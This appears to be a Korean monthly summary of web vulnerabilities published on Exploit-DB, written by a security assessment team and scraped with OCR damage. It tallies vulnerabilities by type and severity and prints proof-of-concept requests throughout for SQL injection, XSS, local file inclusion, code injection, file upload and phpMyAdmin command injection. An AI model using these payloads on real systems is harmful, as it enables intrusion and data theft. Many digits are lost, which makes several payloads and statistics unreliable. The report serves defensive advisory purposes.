EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

Size: px

Start display at page:

Download "EDB 분석보고서 (06.07) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취"

광렬 홍
5 years ago
Views:

1 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다. 06 년 7 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았으며공격패턴도다양하게발견되었습니다. 해당취약점들은일반적으로발생하는 Cross Site Scripting 취약점이아닌특정프로그램상에서만발생하는취약점들이대부분이었습니다. 주요소프트웨어별취약점발생현황을보면, 에서가장많은취약점이발견되었습니다. (* 에서발견된취약점들은 자체의문제가아닌특정 Plug-in 을사용할때발생할수있는취약점이대부분입니다.) 해당취약점들은 Parameter 의 Value 에삽입되는형식과더불어특정 header 를노리는취약점들이었습니다. 취약점이발견된프로그램및 Plug- in 을사용하는관리자는업데이트사항확인및빠른업데이트가요구되어집니다.. 취약점별보고개수 취약점 보고개수 Command Injection Code Injection File Upload LFI 3 SQL Injection 9 XSS 5 총합계 Command Injection 취약점별보고개수 Code Injection File Upload LFI SQL Injection XSS 위험도별분류위험도 보고개수 백분율 상 6.67% 중 % 합계 % 위험도별분류 상 중 8 3. 공격난이도별현황공격난이도 보고개수 백분율 상 6.67% 중 % 하 70.00% 총합계 % 공격난이도별현황 7 상 중 하 4. 주요소프트웨어별취약점발생현황 소프트웨어이름 보고개수 IPS Community Suite CodoForum Tiki Wiki PaKnPost Django PhpMyAdmin PHP File Vault Joomla php Real Estate Script Streamo 총합계 30 주요소프트웨어별취약점발생현황 IPS Community Suite CodoForum Tiki Wiki PaKnPost Django PhpMyAdmin PHP File Vault Joomla php Real Estate Script

2 EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취약점 /ecardmaxdemo/admin/index.php?step=admin_show_key word&what=&row_number=0%0order%0by%0-- &search_year=06&page= SQL Injection 중중 Billing /admin/aomanage.php?search=&cat=status%0union System () %0select%0,,3,version%8%9,5,current_user,7,8, aomanage.php SQL Injection 취 9,0,,,3,4,5,6,7,8,9,0,--&list=3&so=status' 약점 () SQL Injection 상상 POST / HTTP/. Chrome/ Safari/535.7 Photostore /photostore/gallery/objects/4/ page/ SQL Injection 취약점 postgalleryform=&gallerysortby=media_id&gallerysortty pe=asc,(select 973 FROM(SELECT COUNT(*),CONCAT(0x776b6b7,(SELECT (ELT(973=973,))),0x778777,FLOOR(RAND(0)*))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Photostore XSS 하중 index.php XSS 취약점 /ecardmaxdemo/admin/index.php?step=admin_member_d isplay&search_field=all&keyword=%3cscript%3ealert()% 3C%Fscript%3E&cmd_button=Search+User XSS 하중 Photostore workbox.php XSS 취약점 /photostore/workbox.php?mode=addtolightbox&mediaid = ><script>alert(/xss/)</script> Photostore XSS 하중 Photostore mgr.login.php XSS 취약점 /photostore/manager/mgr.login.php?username=demo&pa ssword='><script>alert("xss")</script><input type='hidden Photostore SQL Injection 중중 Billing System () hostingarchiveadmin.php SQL Injection 취약점 # /admin/hostingarchiveadmin.php?search=&cat=status UNION select --&list=&so=status' ().9.

3 EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 File Upload 하중 PaKnPost Pro.4 - select_.cgi File Upload 취약점 POST /cgi-bin/pnp/select_.cgi?sid=../../../cgi-bin/ HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd009908f dd009908f Content-Disposition: form-data; name="file"; filename="pnp-test.txt.cgi" Content-Type: application/octet-stream PaKnPost PaKnPost Pro dd009908f XSS 중중 Billing System () cmanage.php XSS 취약점 POST /admin/cmanage.php HTTP/. Chrome/ Safari/535.7 ().9. reason=%%3e%3cscript%3ealert%8%9%3c%f script%3e XSS 중중 Billing System () helpdesk.php XSS 취약점 POST /admin/helpdesk.php HTTP/. Chrome/ Safari/535.7 ().9. hd_name="><script>alert()</script> XSS 중중 Billing System () omanage.php XSS 취약점 /omanage.php?search=%%3e%3cscript%3ealert% 83%9%3C/script%3E&cat=status%%3E%3Cscript% 3Ealert%84%9%3C/script%3E&list=4%%3E%3Csc ript%3ealert%8%9%3c/script%3e&so=status%% 3E%3Cscript%3Ealert%8%9%3C/script%3E () XSS 하중 POST /serverserver-settings.jsp HTTP/. Chrome/ Safari/ serverserver-settings.jsp XSS 취 약점 3.0. < 4.0. domain=%%f%3e%3cscript%3ealert%8%7xss %7%9%3C%Fscript%3E&remotePort=569&serverA llowed=add+server XSS 하중 advance-user-search.jsp XSS 취약점 /plugins/search/advance-usersearch.jsp?search=true&moreoptions=false&criteria=admi n%/%3e%3cscript%3ealert%8%7xss%7%9% 3C/script%3E&search=Search 3.0. < XSS 하중 POST /muc-service-edit-form.jsp HTTP/. Chrome/ Safari/ mucservice-edit-form.jsp XSS 취약점 3.0. < 4.0. save=true&mucname=test&mucdesc=test%%f%3e% 3Cscript%3Ealert%8%7XSS- %7%9%3C%Fscript%3E

4 EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 XSS 하중 searchprops-edit-form.jsp XSS 취약점 POST /plugins/search/search-props-edit-form.jsp HTTP/. Chrome/ Safari/ < 4.0. searchenabled=true&searchname=%/%3e%3cscript% 3Ealert('XSS')%3C/script%3E&groupOnly=false XSS 하중 groupsummary.jsp XSS 취약점 /groupsummary.jsp?search=test%+onmouseover%3dalert% 8%7XSS%7%9+x%3D% 3.0. < XSS 하중 Real3D FlipBook Plugin - flipbooks.php XSS 취약점 POST /wp-content/plugins/real3dflipbook/includes/flipbooks.php HTTP/. Chrome/ Safari/535.7 Real3D FlipBook Plugin action=delete&bookid=<script>alert(/makman/)</script> SQL Injection 상중 /programs.php?id= %7%0union%0all%0s Streamo Online Radio And TV elect%0concat%80x7e%c0x7%cunhex%8hex% Streaming CMS - programs.php 8cast%8database%8%9%0as%0char%9%9 SQL Injection 취약점 %9%C0x7%C0x7e%9%C0x %0and%0%7x%7%3D%7x Streamo Streamo Online Radio And TV Streaming CM LFI 하중 POST /admin/ajax_cms/get_template_content/ HTTP/. php Real Estate Script 3 - Chrome/ Safari/535.7 /admin/ajax_cms/get_template_ content/ LFI 취약점 php Real Estate Script php Real Estate Script 3 tpl=../../private/config/db.php GET / HTTP/ XSS 하 중 All in One SEO Pack P User-Agent: Abonti </pre><script>alert();</script> All in One SEO Pack Plugin LFI 하중 Tiki Wiki CMS flv_stream.php LFI 취약점 /player/flv/flv_stream.php?file=../../../db/local.php&positio n=0 Tiki Wiki Tiki Wiki CMS 5.0

5 EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 Code Injection 하중 IPS Community Suite in /index.php?app=core&module=system&controller= IPS Community content&do=find&content_class=cms\fields{}phpinfo();/* IPS Community Suite XSS 하 중 POST /wp-login.php HTTP/. Chrome/ Safari/535.7 Activity Log Plugin.3 X-Forwarded-For: <script>alert(document.cookie);</script> Activity Log Plugin.3. log=wordpress&pwd=sdsdssdsdsd&wpsubmit=log+in&redirect_to=http%3a%f%f %Fwp-admin%F&testcookie= SQL Injection 하중 Joomla Guru Pro (com_guru) Component - index.php SQL Injection 취약점 /index.php?option=com_guru&view=gurupcategs&layout= view&itemid=%0and%0=--&lang=en Joomla Joomla Guru Pro (com_guru) Component SQL Injection 중 중 POST /wp-admin/adminajax.php?action=spiderveideoplayerselectplaylist HTTP/. Chrome/ Safari/535.7 Video Player Plugin Video Player Plugin.5. search_events_by_title=&page_number=0serch_or_not=&as c_or_desc=&order_by=(case WHEN (SELECT sleep(0)) = THEN id ELSE title END) ASC #&option=com_spider_video_player&task=select_playlist& boxchecked=0&filter_order_playlist=&filter_order_dir_playli st= POST /index.php HTTP/. Content-Type: multipart/form-data; boundary= dd009908f dd009908f Content-Disposition: form-data; name="to_field" XSS 하중 Django CMS /en/admin/djangocms_snippet/s id nippet// XSS 취약점 dd009908f Content-Disposition: form-data; name="name" Django Django CMS test <img src="x">%0%0>"<iframe src="a">%0<iframe> "><"<img src="x">%0%0>"<iframe src=a><script>alet();</script><iframe> dd009908f--

6 EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection 중중 CodoForum index.php SQL Injection 취약점 /forum/index.php?u=/user/profile/%0and%0(select %0*(IF((SELECT%0*%0FROM%0(SELECT%0CO NCAT((MID((IFNULL(CAST(CURRENT_USER()%0AS%0C HAR),0x0)),,45))))s),% ,% ))) CodoForum CodoForum LFI 하중 PHP File Vault /htdocs/fileinfo.php LFI 취약점 /htdocs/fileinfo.php?sha=..%f..%f..%f..%f..%f.. %Fetc%Fpasswd PHP File Vault PHP File Vault SQL Injection 하중 Ultimate Product Catalog (do_shortcode via ajax) Blind SQL Injection POST /wordpress/wp-admin/adminajax.php?action=update_catalogue HTTP/. Chrome/ Safari/535.7 Ultimate Product Catalog id=+or+sleep(0) ommand Injectio 하 상 POST /tbl_find_replace.php HTTP/. Chrome/ Safari/535.7 PhpMyAdmin tbl_find_repl PhpMyAdmin PhpMyAdmin 4.6. replacewith=system('uname -a');

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time- EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.